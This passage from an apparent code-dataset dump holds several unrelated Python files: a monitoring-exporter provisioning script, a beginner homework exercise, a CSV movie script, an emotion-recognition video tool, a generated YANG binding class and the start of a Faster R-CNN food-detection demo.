https://github.com/wrouesnel/postgres_exporter/releases/download/v0.8.0/postgres_exporter_v0.8.0_linux-amd64.tar.gz\",\n \"tar xzf postgres_exporter_v0.8.0_linux-amd64.tar.gz\",\n \"mv -f postgres_exporter_v0.8.0_linux-amd64/postgres_exporter /usr/local/sbin/ && rm -rf postgres_exporter_v0.8.0_linux-amd64\"\n ]\n\n run_root_commands(cmds)\n\n logger.info(\"downloading apache exporter...\")\n cmds = [\n \"wget https://github.com/Lusitaniae/apache_exporter/releases/download/v0.8.0/apache_exporter-0.8.0.linux-amd64.tar.gz\",\n \"tar xzf apache_exporter-0.8.0.linux-amd64.tar.gz\",\n \"mv -f apache_exporter-0.8.0.linux-amd64/apache_exporter /usr/local/sbin/ && rm -rf apache_exporter-0.8.0.linux-amd64\"\n ]\n\n run_root_commands(cmds)\n\n logger.info(\"downloading node_exporter\")\n cmds = [\n \"wget https://github.com/prometheus/node_exporter/releases/download/v1.0.1/node_exporter-1.0.1.linux-amd64.tar.gz\",\n \"tar xzf node_exporter-1.0.1.linux-amd64.tar.gz\",\n \"mv -f node_exporter-1.0.1.linux-amd64/node_exporter /usr/local/sbin/ && rm -rf node_exporter-1.0.1.linux-amd64\"\n ]\n\n run_root_commands(cmds)\n\ndef provision_supervisord_conf():\n cmds = [\n \"sed -i 's/\\; port\\=\\*\\:9001/port=127\\.0\\.0\\.1\\:9001/g' /usr/local/etc/filewave/supervisor/supervisord-server.conf\",\n \"sed -i 's/\\; \\[inet_http_server\\]/\\[inet_http_server\\]/g' /usr/local/etc/filewave/supervisor/supervisord-server.conf\",\n \"sed -i 's/\\;\\[include\\]/\\[include\\]/g' /usr/local/etc/filewave/supervisor/supervisord-server.conf\",\n \"sed -i 's/\\;files = relative\\/directory\\/\\*\\.ini/files=extras\\/\\*\\.conf/g' /usr/local/etc/filewave/supervisor/supervisord-server.conf\",\n ]\n\n supervisord_dir = 
os.path.join(\"/usr/local/etc/filewave/supervisor/\", \"extras\")\n if not os.path.exists(supervisord_dir):\n os.makedirs(supervisord_dir)\n\n data = pkg_resources.resource_string(\"monitor.config\", \"monitor-v13.conf\").decode('utf-8')\n provisioning_file = os.path.join(supervisord_dir, \"monitor-v13.conf\")\n with open(provisioning_file, \"w\") as f:\n f.write(data)\n\n run_root_commands(cmds)\n\ndef validate_provisioning():\n binaries = [ \"node_exporter\", \"apache_exporter\", \"mtail\", \"postgres_exporter\", \"prometheus\", \"promtool\", \"tsdb\" ]\n for b in binaries:\n f = os.path.join(\"/usr/local/sbin\", b)\n if not os.path.exists(f):\n raise ValidationExceptionBinaryNotFound(f\"failed to find required binary: {f}\")\n else:\n logger.info(f\"OK: {f}\")\n shutil.chown(f, user=\"root\", group=\"root\")\n"} {"ext": "py", "sha": "1a3142240fb52c5c55bc9219738b50d1d08e6c6d", "content": "#Rebecca Schuetz\n#May 25, 2016\n#Homework 2\n\n#1) Make a list of the following numbers: 22, 90, 0, -10, 3, 22, and 48\nnumbers = [22, 90, 0, -10, 3, 22, 48]\n#1) Display the number of elements in the list\nprint(len(numbers))\n#2) Display the 4th element of this list.\nprint(numbers[3])\n#3) Display the sum of the 2nd and 4th element of the list.\nprint(numbers[1] + numbers[3])\n#4) Display the 2nd-largest value in the list.\nprint(sorted(numbers)[-2])\n#5) Display the last element of the original unsorted list\nprint(list(numbers)[-1])\n#6) For each number, display a number: if your original number is less than 10,\n#multiply it by thirty. If it's also even, add six.\n#If it's greater than 50 subtract ten.\n#If it's not negative ten, subtract one.\n#(For example: 2 is less than 10, so 2 * 30 = 60, 2 is also even,\n#so 60 + 6 = 66, 2 is not negative ten, so 66 - 1 = 65.)\n#print('The answers I know are right')\n#for number in numbers:\n# if number < 10:\n# number_less_than_10 = number * 30\n# if number % 2 == 0:\n# if number == -10:\n# print(number_less_than_10 + 6)\n# else:\n# print(number_less_than_10 + 5)\n# else:\n# print(number_less_than_10 - 1)\n# elif number > 50:\n# print(number - 11)\n# else:\n# print(number - 1)\n\n#print('A way of doing it without the awkward minus ones')\nfor number in numbers:\n newnumber = number\n if number < 10:\n newnumber = number * 30\n if number % 2 == 0:\n newnumber = newnumber + 6\n elif number > 50:\n newnumber = number - 10\n if number == -10:\n print(newnumber)\n else:\n print(newnumber - 1)\n#7) Sum the result of each of the numbers divided by two.\nprint(sum(numbers) / 2)\n#DICTIONARIES\n\n#8) Sometimes dictionaries are used to describe multiple aspects of a single object.\n#Like, say, a movie. 
Define a dictionary called movie that works with the following code.\nmovie = {'title': 'The Life Aquatic', 'year': 2004, 'director': 'Wes Anderson',\n'budget': 50000000, 'revenue': 34806726}\n\nprint(\"My favorite movie is\", movie['title'], \"which was released in\", movie['year'],\n\"and was directed by\", movie['director'])\n\n#9) Add entries to the movie dictionary for budget and revenue\n#(you'll use code like movie['budget'] = 1000), and print out the difference between the two.\n\n#10) If the movie cost more to make than it made in theaters, print \"It was a flop\".\n#If the film's revenue was more than five times the amount it cost to make, print \"That was a good investment.\"\nif movie['revenue'] < movie['budget']:\n print(\"It was a flop.\")\nif movie['revenue'] > (movie['budget'] * 5):\n print(\"That was a good investment.\")\n#11) Sometimes dictionaries are used to describe the same aspects of many different objects.\n#Make ONE dictionary that describes the population of the boroughs of NYC.\n#Manhattan has 1.6 million residents,\n#Brooklyn has 2.6m,\n#Bronx has 1.4m,\n#Queens has 2.3m and\n#Staten Island has 470,000.\n#(Tip: keeping it all in either millions or thousands is a good idea)\npopulation = {'Manhattan': 1.6, 'Brooklyn': 2.6, 'Bronx': 1.4, 'Queens': 2.3,\n'Staten Island': .47 }\n\n#12) Display the population of Brooklyn.\nprint(\"Brooklyn has\", population['Brooklyn'], 'million people.')\n#13) Display the combined population of all five boroughs.\nprint(\"All five buroughs have\", round(sum(population.values()),2), 'million people.')\n#14) Display what percent of NYC's population lives in Manhattan.\nprint(round(population['Manhattan'] / sum(population.values()) * 100,2), \"percent of NYC's population lives in Manhattan.\")\n"} {"ext": "py", "sha": "1a3142cff2943e228f408b8354cbe67d1b3270ed", "content": "import sys\nimport csv\nimport get_info\n\ndef main(argv):\n skip = int(argv[1])\n with open('final_movie_upload_data.csv', mode='r') as csv_file:\n csv_reader = csv.DictReader(csv_file)\n for i in range(0, skip):\n next(csv_reader)\n count = 0\n new_data = []\n for row in csv_reader:\n idx = row[\"idx\"]\n title = row[\"title\"]\n #if line_count == 0:\n # print(f'Column names are {\", \".join(row)}')\n # line_count += 1\n # continue\n print(f'\\t{idx} {title}')\n data = get_info.search(title)\n if \"title\" in data and \"description\" in data:\n data[\"idx\"] = idx\n data[\"title\"] = f\"{data['title']}({title})\"\n new_data.append(data)\n count += 1\n if count == 3 :\n break;\n print(f'Processed {count} lines.')\n append(new_data)\n\ndef append(data):\n field_names = ['idx','title','description']\n with open('movie_info.csv', 'a+', newline='') as write_obj:\n dict_writer = csv.DictWriter(write_obj, fieldnames=field_names)\n for row in data:\n dict_writer.writerow(row)\n\n\nif __name__ == \"__main__\":\n main(sys.argv)\n"} {"ext": "py", "sha": "1a31442230ddacbd68261d47f35e92cb2940da0f", "content": "\nfrom tensorflow.keras.models import model_from_json\nimport numpy as np\nimport cv2\nimport math\nimport tensorflow as tf\nfrom tensorflow.keras.preprocessing import image\nfacec = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\nfrom matplotlib import pyplot as plt\nimport os\nimport shutil\nfrom skimage.measure import compare_ssim\n\nwith open(\"model.json\", \"r\") as json_file: #Loading the saved model\n loaded_model_json = json_file.read()\n loaded_model = 
model_from_json(loaded_model_json)\n\nloaded_model.load_weights(\"model_weights.h5\")\nloaded_model._make_predict_function()\nlabel_to_text = {0:'angry', 1:'disgust', 2:'fear', 3:'happy', 4: 'sad'}\n\ndef pred(img_path): \n label_to_text = {0:'angry', 1:'disgust', 2:'fear', 3:'happy', 4: 'sad'} \n img=cv2.imread(img_path)\t\t\t\t\t\t\t\t\t#read Image\n gray_fr = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\t\t\t\t#covert image to grayscale\n faces_rects = facec.detectMultiScale(gray_fr, scaleFactor = 1.2, minNeighbors = 5) #opencv's cascade classifier will be used for detecting the face\n if len(faces_rects)!=0:\n for (x, y, w, h) in faces_rects:\n fc = gray_fr[y:y+h, x:x+w] #extracting only the face part\n roi = cv2.resize(fc, (48, 48))\t#resizing it according to the image that are acceptable by our model\n img = image.img_to_array(roi)\n img = img/255\n img = np.expand_dims(img, axis=0)\n return label_to_text[np.argmax(loaded_model.predict(img))],img #model.predict is used for predicting the emotion\n else:\n return 0,0 #return 0 if the face is not found\n\ndef removeout():\n shutil.rmtree('output/') #remove output folder\n\ndef vidframe(vidname):\n\tif vidname==0:\n\t\tcap = cv2.VideoCapture(0)\n\t\t# Define the codec and create VideoWriter object\n\t\tfourcc = cv2.VideoWriter_fourcc(*'XVID')\n\t\tout = cv2.VideoWriter('output.mp4',fourcc, 20.0, (640,480))\n\n\t\twhile(cap.isOpened()):\n\t\t ret, frame = cap.read()\n\t\t if ret==True:\n\t\t out.write(frame)\n\t\t cv2.imshow('frame',frame)\n\t\t if cv2.waitKey(1) & 0xFF == ord('q'):\n\t\t break\n\t\t else:\n\t\t break\n\n\t\t# Release everything if job is finished\n\t\tcap.release()\n\t\tout.release()\n\t\tcv2.destroyAllWindows()\n\t\tvidname=\"output.mp4\"\n\n\tif os.path.exists('output'): #if output folder is present then delete it\n\t\tremoveout()\t\t\t\t\t\t#create Output folder for storing frame\n\tos.mkdir('output')\n\tcap = cv2.VideoCapture(vidname)\t\t\t#capture video\n\tframeRate=cap.get(5)\t\t\t\t\t\n\tcount = 0\n\twhile(cap.isOpened()):\t\t\t\t\t#store the frames in output folder\n\t\tframeId = cap.get(1)\n\t\tret, frame = cap.read()\n\t\tif (ret != True):\n\t\t\tbreak\n\t\tif (frameId % math.floor(frameRate) == 0):\n\t\t\tfilename =\"output/frame%d.jpg\" % count;count+=1\n\t\t\tcv2.imwrite(filename, frame)\n\tcap.release()\n\tresult=[]\t\t\t\t\t\t\t# used for storing emotion\n\tface=[]\t\t\t\t\t\t\t\t#used for storing face images\n\tfor filename in os.listdir(\"output\"): #loop through each frame\n\t\ta,b = pred(\"output/\"+filename) #run pred function to get emotion and face images\n\t\tresult.append(a)\n\t\tface.append(b)\n\tremoveout()\n\tresult=[x for x in result if x!=0] #removing null prediction\n\tface=[x for x in face if len(str(x))>1]\n\treturn result, face\n\ndef ssimscore1(im1,im2):\n im1=im1.reshape(48, 48, 1).astype('float32') #reshaping the flattened image array\n im2=im2.reshape(48, 48, 1).astype('float32')\n (score, diff) = compare_ssim(im1, im2, full=True,multichannel=True) #comparing the image for finding difference using compare_ssim function \n return score\n \n\n\n\n\n\n"} {"ext": "py", "sha": "1a31448f1f90b075db6dd6164c277187bb7926fc", "content": "\nfrom operator import attrgetter\nimport pyangbind.lib.xpathhelper as xpathhelper\nfrom pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType\nfrom pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType\nfrom pyangbind.lib.base import PybindBase\nfrom decimal import Decimal\nfrom bitarray import 
bitarray\nimport __builtin__\nclass cpu_info_state(PybindBase):\n \"\"\"\n This class was auto-generated by the PythonClass plugin for PYANG\n from YANG module brocade-qos-operational - based on the path /cpu-info-state. Each member element of\n the container is represented as a class variable - with a specific\n YANG type.\n\n YANG Description: CPU EGID and Group ID mapping\n \"\"\"\n __slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__name','__egid','__group_id','__description',)\n\n _yang_name = 'cpu-info-state'\n _rest_name = 'cpu-info-state'\n\n _pybind_generated_by = 'container'\n\n def __init__(self, *args, **kwargs):\n\n path_helper_ = kwargs.pop(\"path_helper\", None)\n if path_helper_ is False:\n self._path_helper = False\n elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):\n self._path_helper = path_helper_\n elif hasattr(self, \"_parent\"):\n path_helper_ = getattr(self._parent, \"_path_helper\", False)\n self._path_helper = path_helper_\n else:\n self._path_helper = False\n\n extmethods = kwargs.pop(\"extmethods\", None)\n if extmethods is False:\n self._extmethods = False\n elif extmethods is not None and isinstance(extmethods, dict):\n self._extmethods = extmethods\n elif hasattr(self, \"_parent\"):\n extmethods = getattr(self._parent, \"_extmethods\", None)\n self._extmethods = extmethods\n else:\n self._extmethods = False\n self.__group_id = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['-128..127']}, int_size=8), is_leaf=True, yang_name=\"group-id\", rest_name=\"group-id\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-qos-operational', defining_module='brocade-qos-operational', yang_type='int8', is_config=False)\n self.__egid = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name=\"egid\", rest_name=\"egid\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-qos-operational', defining_module='brocade-qos-operational', yang_type='uint32', is_config=False)\n self.__name = YANGDynClass(base=unicode, is_leaf=True, yang_name=\"name\", rest_name=\"name\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-qos-operational', defining_module='brocade-qos-operational', yang_type='string', is_config=False)\n self.__description = YANGDynClass(base=unicode, is_leaf=True, yang_name=\"description\", rest_name=\"description\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-qos-operational', defining_module='brocade-qos-operational', yang_type='string', is_config=False)\n\n load = kwargs.pop(\"load\", None)\n if args:\n if len(args) > 1:\n raise TypeError(\"cannot create a YANG container with >1 argument\")\n all_attr = True\n for e in self._pyangbind_elements:\n if not hasattr(args[0], e):\n all_attr = False\n break\n if not all_attr:\n raise ValueError(\"Supplied object did not have the correct attributes\")\n for e in self._pyangbind_elements:\n nobj = getattr(args[0], e)\n if nobj._changed() is False:\n continue\n setmethod = getattr(self, \"_set_%s\" % e)\n if load is None:\n setmethod(getattr(args[0], e))\n else:\n 
setmethod(getattr(args[0], e), load=load)\n\n def _path(self):\n if hasattr(self, \"_parent\"):\n return self._parent._path()+[self._yang_name]\n else:\n return [u'cpu-info-state']\n\n def _rest_path(self):\n if hasattr(self, \"_parent\"):\n if self._rest_name:\n return self._parent._rest_path()+[self._rest_name]\n else:\n return self._parent._rest_path()\n else:\n return [u'cpu-info-state']\n\n def _get_name(self):\n \"\"\"\n Getter method for name, mapped from YANG variable /cpu_info_state/name (string)\n\n YANG Description: CPU EGID name\n \"\"\"\n return self.__name\n \n def _set_name(self, v, load=False):\n \"\"\"\n Setter method for name, mapped from YANG variable /cpu_info_state/name (string)\n If this variable is read-only (config: false) in the\n source YANG file, then _set_name is considered as a private\n method. Backends looking to populate this variable should\n do so via calling thisObj._set_name() directly.\n\n YANG Description: CPU EGID name\n \"\"\"\n if hasattr(v, \"_utype\"):\n v = v._utype(v)\n try:\n t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name=\"name\", rest_name=\"name\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-qos-operational', defining_module='brocade-qos-operational', yang_type='string', is_config=False)\n except (TypeError, ValueError):\n raise ValueError({\n 'error-string': \"\"\"name must be of a type compatible with string\"\"\",\n 'defined-type': \"string\",\n 'generated-type': \"\"\"YANGDynClass(base=unicode, is_leaf=True, yang_name=\"name\", rest_name=\"name\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-qos-operational', defining_module='brocade-qos-operational', yang_type='string', is_config=False)\"\"\",\n })\n\n self.__name = t\n if hasattr(self, '_set'):\n self._set()\n\n def _unset_name(self):\n self.__name = YANGDynClass(base=unicode, is_leaf=True, yang_name=\"name\", rest_name=\"name\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-qos-operational', defining_module='brocade-qos-operational', yang_type='string', is_config=False)\n\n\n def _get_egid(self):\n \"\"\"\n Getter method for egid, mapped from YANG variable /cpu_info_state/egid (uint32)\n\n YANG Description: CPU EGID value\n \"\"\"\n return self.__egid\n \n def _set_egid(self, v, load=False):\n \"\"\"\n Setter method for egid, mapped from YANG variable /cpu_info_state/egid (uint32)\n If this variable is read-only (config: false) in the\n source YANG file, then _set_egid is considered as a private\n method. 
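Each generated _set_* method here wraps the incoming value in a range-restricted type and turns a failed coercion into a ValueError that names the YANG type. Stripped of the pyangbind machinery, the underlying idea is a validating setter; a stand-alone sketch for the uint32 egid leaf (class and helper names are illustrative, not part of the generated code):

class RangeError(ValueError):
    pass

def make_uint32(value):
    # Mirrors the '0..4294967295' restriction on the egid leaf.
    v = int(value)
    if not 0 <= v <= 4294967295:
        raise RangeError('egid must be of a type compatible with uint32: %r' % (value,))
    return v

class CpuInfoSketch(object):
    def __init__(self):
        self._egid = 0

    def set_egid(self, value):
        self._egid = make_uint32(value)

info = CpuInfoSketch()
info.set_egid(42)          # accepted
# info.set_egid(-1)        # would raise RangeError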
Backends looking to populate this variable should\n do so via calling thisObj._set_egid() directly.\n\n YANG Description: CPU EGID value\n \"\"\"\n if hasattr(v, \"_utype\"):\n v = v._utype(v)\n try:\n t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name=\"egid\", rest_name=\"egid\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-qos-operational', defining_module='brocade-qos-operational', yang_type='uint32', is_config=False)\n except (TypeError, ValueError):\n raise ValueError({\n 'error-string': \"\"\"egid must be of a type compatible with uint32\"\"\",\n 'defined-type': \"uint32\",\n 'generated-type': \"\"\"YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name=\"egid\", rest_name=\"egid\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-qos-operational', defining_module='brocade-qos-operational', yang_type='uint32', is_config=False)\"\"\",\n })\n\n self.__egid = t\n if hasattr(self, '_set'):\n self._set()\n\n def _unset_egid(self):\n self.__egid = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name=\"egid\", rest_name=\"egid\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-qos-operational', defining_module='brocade-qos-operational', yang_type='uint32', is_config=False)\n\n\n def _get_group_id(self):\n \"\"\"\n Getter method for group_id, mapped from YANG variable /cpu_info_state/group_id (int8)\n\n YANG Description: CPU Group ID\n \"\"\"\n return self.__group_id\n \n def _set_group_id(self, v, load=False):\n \"\"\"\n Setter method for group_id, mapped from YANG variable /cpu_info_state/group_id (int8)\n If this variable is read-only (config: false) in the\n source YANG file, then _set_group_id is considered as a private\n method. 
Backends looking to populate this variable should\n do so via calling thisObj._set_group_id() directly.\n\n YANG Description: CPU Group ID\n \"\"\"\n parent = getattr(self, \"_parent\", None)\n if parent is not None and load is False:\n raise AttributeError(\"Cannot set keys directly when\" +\n \" within an instantiated list\")\n\n if hasattr(v, \"_utype\"):\n v = v._utype(v)\n try:\n t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['-128..127']}, int_size=8), is_leaf=True, yang_name=\"group-id\", rest_name=\"group-id\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-qos-operational', defining_module='brocade-qos-operational', yang_type='int8', is_config=False)\n except (TypeError, ValueError):\n raise ValueError({\n 'error-string': \"\"\"group_id must be of a type compatible with int8\"\"\",\n 'defined-type': \"int8\",\n 'generated-type': \"\"\"YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['-128..127']}, int_size=8), is_leaf=True, yang_name=\"group-id\", rest_name=\"group-id\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-qos-operational', defining_module='brocade-qos-operational', yang_type='int8', is_config=False)\"\"\",\n })\n\n self.__group_id = t\n if hasattr(self, '_set'):\n self._set()\n\n def _unset_group_id(self):\n self.__group_id = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['-128..127']}, int_size=8), is_leaf=True, yang_name=\"group-id\", rest_name=\"group-id\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-qos-operational', defining_module='brocade-qos-operational', yang_type='int8', is_config=False)\n\n\n def _get_description(self):\n \"\"\"\n Getter method for description, mapped from YANG variable /cpu_info_state/description (string)\n\n YANG Description: Description of CPU EGID\n \"\"\"\n return self.__description\n \n def _set_description(self, v, load=False):\n \"\"\"\n Setter method for description, mapped from YANG variable /cpu_info_state/description (string)\n If this variable is read-only (config: false) in the\n source YANG file, then _set_description is considered as a private\n method. 
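At the bottom of this generated class (see the property assignments after the setters), every leaf is exposed through a getter-only property, so plain attribute assignment fails and state can only change through the private _set_* methods. The same effect in ordinary Python, shown here only as a small illustration of the pattern rather than as generated code:

class ReadOnlyLeaves(object):
    def __init__(self, name, group_id):
        self._name = name
        self._group_id = group_id

    @property
    def name(self):
        return self._name

    @property
    def group_id(self):
        return self._group_id

leaves = ReadOnlyLeaves('cpu0', 7)
print(leaves.name, leaves.group_id)
# leaves.name = 'cpu1'   # AttributeError: can't set attribute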
Backends looking to populate this variable should\n do so via calling thisObj._set_description() directly.\n\n YANG Description: Description of CPU EGID\n \"\"\"\n if hasattr(v, \"_utype\"):\n v = v._utype(v)\n try:\n t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name=\"description\", rest_name=\"description\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-qos-operational', defining_module='brocade-qos-operational', yang_type='string', is_config=False)\n except (TypeError, ValueError):\n raise ValueError({\n 'error-string': \"\"\"description must be of a type compatible with string\"\"\",\n 'defined-type': \"string\",\n 'generated-type': \"\"\"YANGDynClass(base=unicode, is_leaf=True, yang_name=\"description\", rest_name=\"description\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-qos-operational', defining_module='brocade-qos-operational', yang_type='string', is_config=False)\"\"\",\n })\n\n self.__description = t\n if hasattr(self, '_set'):\n self._set()\n\n def _unset_description(self):\n self.__description = YANGDynClass(base=unicode, is_leaf=True, yang_name=\"description\", rest_name=\"description\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-qos-operational', defining_module='brocade-qos-operational', yang_type='string', is_config=False)\n\n name = __builtin__.property(_get_name)\n egid = __builtin__.property(_get_egid)\n group_id = __builtin__.property(_get_group_id)\n description = __builtin__.property(_get_description)\n\n\n _pyangbind_elements = {'name': name, 'egid': egid, 'group_id': group_id, 'description': description, }\n\n\n"} {"ext": "py", "sha": "1a3147e48ad4eeca45f01c46703c327d79896717", "content": "# --------------------------------------------------------\n# Tensorflow Faster R-CNN\n# Licensed under The MIT License [see LICENSE for details]\n# Written by Jiasen Lu, Jianwei Yang, based on code from Ross Girshick\n# --------------------------------------------------------\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport _init_paths\nimport os\nimport sys\nimport numpy as np\nimport argparse\nimport pprint\nimport pdb\nimport time\nimport cv2\nimport torch\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport torch.optim as optim\n\nimport xml.etree.ElementTree as ET\nimport torchvision.transforms as transforms\nimport torchvision.datasets as dset\nfrom scipy.misc import imread\nfrom roi_data_layer.roidb import combined_roidb\nfrom roi_data_layer.roibatchLoader import roibatchLoader\nfrom model.utils.config import cfg, cfg_from_file, cfg_from_list, get_output_dir\nfrom model.rpn.bbox_transform import clip_boxes\nfrom model.nms.nms_wrapper import nms\nfrom model.rpn.bbox_transform import bbox_transform_inv\nfrom model.utils.net_utils import save_net, load_net, vis_detections\nfrom model.utils.blob import im_list_to_blob\nfrom model.faster_rcnn.vgg16 import vgg16\nfrom model.faster_rcnn.resnet import resnet\nfrom model.faster_rcnn.prefood_res50 import PreResNet50\nfrom datasets.food_category import get_categories\nfrom datasets.id2name import id2eng, id2chn\n\ntry:\n xrange # Python 2\nexcept NameError:\n xrange = range # Python 3\n\nbeehoonid2name = {'1': 'bee hoon', '2': 'fried noodles', '3': 'kway teow', '4': 'kway 
teow, yellow noodles mix', '5': 'rice', '51': 'fried rice', '7': 'hokkien mee', '8': 'maggie noodle', '9': 'Glutinous rice', '10': 'beehoon and noodle mix', '110': 'stir fry mee tai mak', '11': 'fried egg', '12': 'scrambled egg', '13': 'cabbage', '131': 'hairy gourd with egg', '14': 'french bean/long bean', '141': 'broccoli', '142': 'celery', '143': 'beansprout', '15': 'deep fried beancurd skin', '16':\n 'fried beancurd/taukwa', '17': 'taupok', '171': 'braised taupok', '18': 'Acar', '181': 'Stir fried eggplant', '19': 'cucumber', '21': 'luncheon meat', '22': 'hashbrown', '23': 'ngoh hiang', '24': 'begedil', '25': 'spring roll', '31': 'otah', '32': 'fish ball/sotong ball', '33': 'white, yellow fish fillet', '331': 'orange, red fish fillet', '34': 'fish cake', '341': 'ngoh hiang fish cake', '35': 'kuning fish (fried small fish)', '351': 'fried fish steak', '36': 'siew mai',\n '41': 'hotdog/taiwan sausage', '42': 'seaweed chicken', '43': 'chicken nugget', '44': 'fried chicken / chicken wings', '441': 'fried chicken chopped up', '45': 'fried chicken cutlet (not ground meat)', '55': 'curry mixed veg', '551': 'curry chicken and potato', '61': 'ikan bilis', '62': 'chilli paste', '63': 'green chilli', '64': 'peanut', '65': 'Sweet Sauce', '66': 'red chilli chopped', '71': 'deep fried fish', '91': 'Butter cereal chicken', '92': 'fried wanton/ dumpling', '93':\n 'Vegetarian meat', '94': 'Fried onions', '95': 'Crabstick'}\n\n#id2chn = beehoonid2name\n\ndef parse_rec(filename):\n \"\"\" Parse a PASCAL VOC xml file \"\"\"\n tree = ET.parse(filename)\n objects = []\n for obj in tree.findall('object'):\n obj_struct = {}\n obj_struct['name'] = obj.find('name').text\n obj_struct['pose'] = obj.find('pose').text\n obj_struct['truncated'] = int(obj.find('truncated').text)\n obj_struct['difficult'] = int(obj.find('difficult').text)\n bbox = obj.find('bndbox')\n obj_struct['bbox'] = [int(bbox.find('xmin').text),\n int(bbox.find('ymin').text),\n int(bbox.find('xmax').text),\n int(bbox.find('ymax').text)]\n objects.append(obj_struct)\n\n return objects\n\ndef parse_args():\n \"\"\"\n Parse input arguments\n \"\"\"\n parser = argparse.ArgumentParser(description='Train a Fast R-CNN network')\n parser.add_argument('--dataset', dest='dataset',\n help='training dataset',\n default='pascal_voc', type=str)\n parser.add_argument('--cfg', dest='cfg_file',\n help='optional config file',\n default='cfgs/vgg16.yml', type=str)\n parser.add_argument('--net', dest='net',\n help='vgg16, res50, res101, res152',\n default='res101', type=str)\n parser.add_argument('--set', dest='set_cfgs',\n help='set config keys', default=None,\n nargs=argparse.REMAINDER)\n parser.add_argument('--load_dir', dest='load_dir',\n help='directory to load models',\n default=\"/srv/share/jyang375/models\")\n parser.add_argument('--image_dir', dest='image_dir',\n help='directory to load images for demo',\n default=\"images\")\n parser.add_argument('--cuda', dest='cuda',\n help='whether use CUDA',\n action='store_true')\n parser.add_argument('--mGPUs', dest='mGPUs',\n help='whether use multiple GPUs',\n action='store_true')\n parser.add_argument('--cag', dest='class_agnostic',\n help='whether perform class_agnostic bbox regression',\n action='store_true')\n parser.add_argument('--parallel_type', dest='parallel_type',\n help='which part of model to parallel, 0: all, 1: model before roi pooling',\n default=0, type=int)\n parser.add_argument('--checksession', dest='checksession',\n help='checksession to load model',\n default=1, type=int)\n 
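parse_rec above walks a PASCAL VOC annotation with xml.etree.ElementTree and flattens each <object> element into a dict. A self-contained usage sketch with a tiny in-memory annotation (the XML below is made up for illustration and omits the pose/truncated/difficult fields that parse_rec also reads):

import xml.etree.ElementTree as ET

SAMPLE = """
<annotation>
  <object>
    <name>rice</name>
    <bndbox><xmin>10</xmin><ymin>20</ymin><xmax>110</xmax><ymax>220</ymax></bndbox>
  </object>
</annotation>
"""

def parse_objects(root):
    objects = []
    for obj in root.findall('object'):
        bbox = obj.find('bndbox')
        objects.append({
            'name': obj.find('name').text,
            'bbox': [int(bbox.find(t).text) for t in ('xmin', 'ymin', 'xmax', 'ymax')],
        })
    return objects

print(parse_objects(ET.fromstring(SAMPLE)))
# [{'name': 'rice', 'bbox': [10, 20, 110, 220]}]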
